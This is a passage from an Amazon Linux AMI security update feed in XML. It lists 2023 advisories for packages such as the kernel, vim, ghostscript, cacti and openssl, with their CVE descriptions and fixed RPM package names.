20:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-22218:
An issue was discovered in function _libssh2_packet_add in libssh2 1.10.0 allows attackers to access out of bounds memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22218" title="" id="CVE-2020-22218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-devel" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1835</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1835: important priority package update for ghostscript</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-21890:
Buffer Overflow vulnerability in clj_media_size function in devices/gdevclj.c in Artifex Ghostscript 9.50 allows remote attackers to cause a denial of service or other unspecified impact(s) via opening of crafted PDF document.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21890" title="" id="CVE-2020-21890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1836</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1836: medium priority package update for mutt</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4875:
Null pointer dereference when composing from a specially crafted draft message in Mutt >1.5.2 <2.2.12
CVE-2023-4874:
Null pointer dereference when viewing a specially crafted email in Mutt >1.5.2 <2.2.12
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4874" title="" id="CVE-2023-4874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4875" title="" id="CVE-2023-4875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.10.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.10.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.10.amzn1.i686.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1837</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1837: important priority package update for vim</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4752:
Use After Free in GitHub repository vim/vim prior to 9.0.1858.
CVE-2023-4750:
Use After Free in GitHub repository vim/vim prior to 9.0.1857.
CVE-2023-4733:
Use After Free in GitHub repository vim/vim prior to 9.0.1840.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4733" title="" id="CVE-2023-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4750" title="" id="CVE-2023-4750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4752" title="" id="CVE-2023-4752" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.83.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.83.amzn1.noarch.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1838</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1838: important priority package update for kernel</title><issued date="2023-09-27 22:15:00" /><updated date="2024-03-13 19:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4921:
A use-after-free vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
When the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().
We recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.
CVE-2023-4623:
A use-after-free vulnerability in the Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.
If a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.
We recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.
CVE-2023-4622:
A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.
The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.
We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.
CVE-2023-45871:
An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.
CVE-2023-42755:
A flaw was found in rsvp_change(). The root cause is an slab-out-of-bound access, but since the offset to the original pointer is an `unsign int` fully controlled by users, the behavior is usually a wild pointer access.
CVE-2023-42753:
The upstream commit describes this issue as follows:
The missing IP_SET_HASH_WITH_NET0 macro in ip_set_hash_netportnet can lead to the use of wrong `CIDR_POS(c)` for calculating array offsets, which can lead to integer underflow. As a result, it leads to slab out-of-bound access.
CVE-2023-4244:
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability.
We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.
CVE-2023-4207:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.
When fw_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit 76e42ae831991c828cffa8c37736ebfb831ad5ec.
CVE-2023-39194:
net: xfrm: Fix xfrm_address_filter OOB read
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1492/
NOTE: https://git.kernel.org/linus/dfa73c17d55b921e1d4e154976de35317e43a93a (6.5-rc7)
CVE-2023-39193:
netfilter: xt_sctp: validate the flag_info count
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1491/
NOTE: https://git.kernel.org/linus/e99476497687ef9e850748fe6d232264f30bc8f9 (6.6-rc1)
CVE-2023-39192:
netfilter: xt_u32: validate user space input
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1490/
NOTE: https://git.kernel.org/linus/69c5d284f67089b4750d28ff6ac6f52ec224b330 (6.6-rc1)
CVE-2023-3772:
A flaw was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3772" title="" id="CVE-2023-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39192" title="" id="CVE-2023-39192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39193" title="" id="CVE-2023-39193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39194" title="" id="CVE-2023-39194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4207" title="" id="CVE-2023-4207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4244" title="" id="CVE-2023-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42753" title="" id="CVE-2023-42753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42755" title="" id="CVE-2023-42755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45871" title="" id="CVE-2023-45871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4622" title="" id="CVE-2023-4622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4623" title="" id="CVE-2023-4623" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4921" title="" id="CVE-2023-4921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.326-171.539.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1839</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1839: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-41175:
Multiple potential integer overflow in raw2tiff.c in libtiff <= 4.5.1 can allow remote attackers to cause a denial of service (application crash) or possibly execute an arbitrary code via a crafted tiff image which triggers a heap-based buffer overflow.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41175" title="" id="CVE-2023-41175" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1840</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1840: important priority package update for axis</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40743:
** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE.
As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40743" title="" id="CVE-2023-40743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis-javadoc" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package><package name="axis" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package><package name="axis-manual" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1841</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1841: medium priority package update for libxml2</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39615:
Xmlsoft Libxml2 v2.11.0 was discovered to contain a global buffer overflow via the xmlSAX2StartElement() function at /libxml2/SAX2.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted XML file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39615" title="" id="CVE-2023-39615" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1842</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1842: important priority package update for cacti</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39357:
Cacti is an open source operational monitoring and fault management framework. A defect in the sql_save function was discovered. When the column type is numeric, the sql_save function directly utilizes user input. Many files and functions calling the sql_save function do not perform prior validation of user input, leading to the existence of multiple SQL injection vulnerabilities in Cacti. This allows authenticated users to exploit these SQL injection vulnerabilities to perform privilege escalation and remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39357" title="" id="CVE-2023-39357" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="4.22.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-4.22.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1843</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1843: medium priority package update for openssl</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3817:
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. After fixing
CVE-2023-3446 it was discovered that a large q parameter value can also trigger
an overly long computation during some of these checks. A correct q value,
if present, cannot be larger than the modulus p parameter, thus it is
unnecessary to perform these checks if q is larger than p.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulnerable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the "-check" option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
CVE-2023-3446:
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. One of those
checks confirms that the modulus ('p' parameter) is not too large. Trying to use
a very large modulus is slow and OpenSSL will not normally use a modulus which
is over 10,000 bits in length.
However the DH_check() function checks numerous aspects of the key or parameters
that have been supplied. Some of those checks use the supplied modulus value
even if it has already been found to be too large.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulernable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the '-check' option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3446" title="" id="CVE-2023-3446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3817" title="" id="CVE-2023-3817" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.164.amzn1" epoch="1" 